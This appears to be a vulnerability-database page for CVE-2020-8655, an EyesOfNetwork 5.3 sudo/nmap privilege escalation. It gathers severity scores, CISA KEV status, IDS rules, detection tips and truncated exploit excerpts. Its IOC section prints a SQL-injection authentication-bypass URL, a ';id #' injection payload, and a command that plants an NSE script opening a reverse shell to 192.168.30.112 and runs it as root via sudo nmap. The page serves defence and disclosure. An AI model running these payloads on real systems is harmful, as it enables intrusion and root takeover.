CVE-2020-8655
published 2020-02-07CVE-2020-8655: An issue was discovered in EyesOfNetwork 5.3. The sudoers configuration is prone to a privilege escalation vulnerability, allowing the apache user to run…
PriorityP183high7.8CVSS 3.1
AVLACLPRNUIRSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
58.08%
99.0th percentile
An issue was discovered in EyesOfNetwork 5.3. The sudoers configuration is prone to a privilege escalation vulnerability, allowing the apache user to run arbitrary commands as root via a crafted NSE script for nmap 7.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| eyesofnetwork | eyesofnetwork | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/eonapi/getApiKey?&username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet↗
command;echo "local os = require \"os\" hostrule=function(host) os.execute(\"/bin/sh -i >& /dev/tcp/192.168.30.112/8081 0>&1\") end action=function() end" > /tmp/h4k;sudo /usr/bin/nmap localhost -p 1337 -script /tmp/h4k #↗
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT EyesOfNetwork Autodiscover Command Injection (CVE-2020-8654)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/lilac/autodiscovery.php"; endswith; fast_pattern; http.request_body; content:"request=autodiscover"; nocase; content:"job_name="; nocase; content:"nmap_binary"; nocase; content:"target[]"; nocase; content:"os.execute("; nocase; reference:url,www.exploit-db.com/exploits/48169; reference:cve,2020-8654; reference:cve,2020-8655; classtype:attempted-admin; sid:2034311; rev:1; metadata:attack_target Server, created_at 2021_11_01, cve CVE_2020_8654, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2021_11_01, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)- →Detect POST requests to /lilac/autodiscovery.php containing 'request=autodiscover', 'nmap_binary', 'target[]', and 'os.execute(' in the body — the combination indicates NSE payload injection for CVE-2020-8655 privilege escalation via nmap. ↗
- →Monitor for creation of NSE script files in /tmp (e.g. /tmp/h4k) followed by execution of 'sudo /usr/bin/nmap' with a --script flag pointing to /tmp — this is the privilege escalation execution chain for CVE-2020-8655. ↗
- →Flag the exploit-specific user-agent string 'Mozilla/5.0 (Windows NT 1.0; WOW64; rv:13.37) Gecko/20200104 Firefox/13.37' in HTTP logs as it is hardcoded in the public PoC exploit script. ↗
- →Detect the command injection pattern ';id #' or similar semicolon-prefixed commands with a trailing '#' comment in the target[] POST parameter of autodiscovery.php. ↗
- ·The Metasploit module requires HTTPS (SSL=true) and will not function over plain HTTP; RPORT defaults to 443. ↗
- ·The nmap privesc (CVE-2020-8655) depends on nmap version 6.40 being present, which lacks the -c and -e options, making NSE script execution the only viable escalation path. ↗
- ·Authentication bypass via hardcoded API key applies only to EON 5.3; EON 5.1 and 5.2 can only be exploited via SQL injection. ↗
CVSS provenance
nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck7.8HIGH
cisa7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-qhg6-px34-g7qc: An issue was discovered in EyesOfNetwork 5
ghsa_unreviewed·2022-05-24
CVE-2020-8655 [HIGH] CWE-269 GHSA-qhg6-px34-g7qc: An issue was discovered in EyesOfNetwork 5
An issue was discovered in EyesOfNetwork 5.3. The sudoers configuration is prone to a privilege escalation vulnerability, allowing the apache user to run arbitrary commands as root via a crafted NSE script for nmap 7.
VulnCheck
EyesOfNetwork Improper Privilege Management Vulnerability
vulncheck·2020·CVSS 7.8
CVE-2020-8655 [HIGH] CWE-269 EyesOfNetwork Improper Privilege Management Vulnerability
EyesOfNetwork Improper Privilege Management Vulnerability
EyesOfNetwork contains an improper privilege management vulnerability that may allow a user to run commands as root via a crafted Nmap Scripting Engine (NSE) script to nmap7.
Affected: EyesOfNetwork EyesOfNetwork
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Exploit PoC: https://vulncheck.com/xdb/743d1c5492ba
Remediation Due: 2022-05-03
CISA
EyesOfNetwork Improper Privilege Management Vulnerability
cisa·2021-11-03·CVSS 7.8
CVE-2020-8655 [HIGH] CWE-269 EyesOfNetwork Improper Privilege Management Vulnerability
Vulnerability: EyesOfNetwork Improper Privilege Management Vulnerability
Affected: EyesOfNetwork EyesOfNetwork
EyesOfNetwork contains an improper privilege management vulnerability that may allow a user to run commands as root via a crafted Nmap Scripting Engine (NSE) script to nmap7.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2020-8655
Remediation Due Date: 2022-05-03
Suricata
ET EXPLOIT EyesOfNetwork Autodiscover Command Injection (CVE-2020-8654)
suricata·2021-11-01·CVSS 8.8
CVE-2020-8654 [HIGH] ET EXPLOIT EyesOfNetwork Autodiscover Command Injection (CVE-2020-8654)
ET EXPLOIT EyesOfNetwork Autodiscover Command Injection (CVE-2020-8654)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT EyesOfNetwork Autodiscover Command Injection (CVE-2020-8654)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/lilac/autodiscovery.php"; endswith; fast_pattern; http.request_body; content:"request=autodiscover"; nocase; content:"job_name="; nocase; content:"nmap_binary"; nocase; content:"target[]"; nocase; content:"os.execute("; nocase; reference:url,www.exploit-db.com/exploits/48169; reference:cve,2020-8654; reference:cve,2020-8655; classtype:attempted-admin; sid:2034311; rev:1; metadata:attack_target Server, created_at 2021_11_01, cve CVE_2020_8654, deployment Perimeter, deployment Internal, confidence High, signa
Exploit-DB
EyesOfNetwork - AutoDiscovery Target Command Execution (Metasploit)
exploitdb·2020-03-05
CVE-2020-8657 EyesOfNetwork - AutoDiscovery Target Command Execution (Metasploit)
EyesOfNetwork - AutoDiscovery Target Command Execution (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'EyesOfNetwork AutoDiscovery Target Command Execution',
'Description' => %q{
This module exploits multiple vulnerabilities in EyesOfNetwork version 5.3
and prior in order to execute arbitrary commands as root.
This module takes advantage of a command injection vulnerability in the
`target` parameter of the AutoDiscovery functionality within the EON web
interface in order to write an Nmap NSE script containing the payload to
disk. It then starts an Nmap scan to activate the payload. This results in
privilege escalation because the`apache` user can execute Nm
Exploit-DB
EyesOfNetwork 5.3 - Remote Code Execution
exploitdb·2020-02-07·CVSS 8.8
CVE-2020-8656 [HIGH] EyesOfNetwork 5.3 - Remote Code Execution
EyesOfNetwork 5.3 - Remote Code Execution
---
# Exploit Title: EyesOfNetwork 5.3 - Remote Code Execution
# Date: 2020-02-01
# Exploit Author: Clément Billac
# Vendor Homepage: https://www.eyesofnetwork.com/
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
# Version: 5.3
# CVE : CVE-2020-8654, CVE-2020-8655, CVE-2020-8656
#!/bin/env python3
# coding: utf8
#
#
# CVE-2020-8654 - Discovery module to allows to run arbitrary OS commands
# We were able to run the 'id' command with the following payload in the target field : ';id #'.
#
# CVE-2020-8655 - LPE via nmap NSE script
# As the apache user is allowed to run nmap as root, we were able to execute arbitrary commands by providing a specially crafted NSE script.
# nmap version 6.40 is used and doesn't have
Nuclei
EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution
nuclei·CVSS 8.8
CVE-2020-8654 [HIGH] EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution
EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution
EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. See also CVE-2020-8655, CVE-2020-8656, CVE-2020-8657, and CVE-2020-9465.
Template:
id: CVE-2020-8654
info:
name: EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution
author: praetorian-thendrickson
severity: high
description: EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context
Metasploit
EyesOfNetwork 5.1-5.3 AutoDiscovery Target Command Execution
metasploit
EyesOfNetwork 5.1-5.3 AutoDiscovery Target Command Execution
EyesOfNetwork 5.1-5.3 AutoDiscovery Target Command Execution
This module exploits multiple vulnerabilities in EyesOfNetwork version 5.1, 5.2 and 5.3 in order to execute arbitrary commands as root. This module takes advantage of a command injection vulnerability in the `target` parameter of the AutoDiscovery functionality within the EON web interface in order to write an Nmap NSE script containing the payload to disk. It then starts an Nmap scan to activate the payload. This results in privilege escalation because the`apache` user can execute Nmap as root. Valid credentials for a user with administrative privileges are required. However, this module can bypass authentication via various methods, depending on the EON version. EON 5.3 is vulnerable to a hardcoded API key and two SQL injectio
No writeups or analysis indexed.
http://packetstormsecurity.com/files/156266/EyesOfNetwork-5.3-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/156605/EyesOfNetwork-AutoDiscovery-Target-Command-Execution.htmlhttps://github.com/EyesOfNetworkCommunity/eonconf/issues/8http://packetstormsecurity.com/files/156266/EyesOfNetwork-5.3-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/156605/EyesOfNetwork-AutoDiscovery-Target-Command-Execution.htmlhttps://github.com/EyesOfNetworkCommunity/eonconf/issues/8https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-8655
2020-02-07
Published
2021-11-03
Added to CISA KEV
Exploited in the wild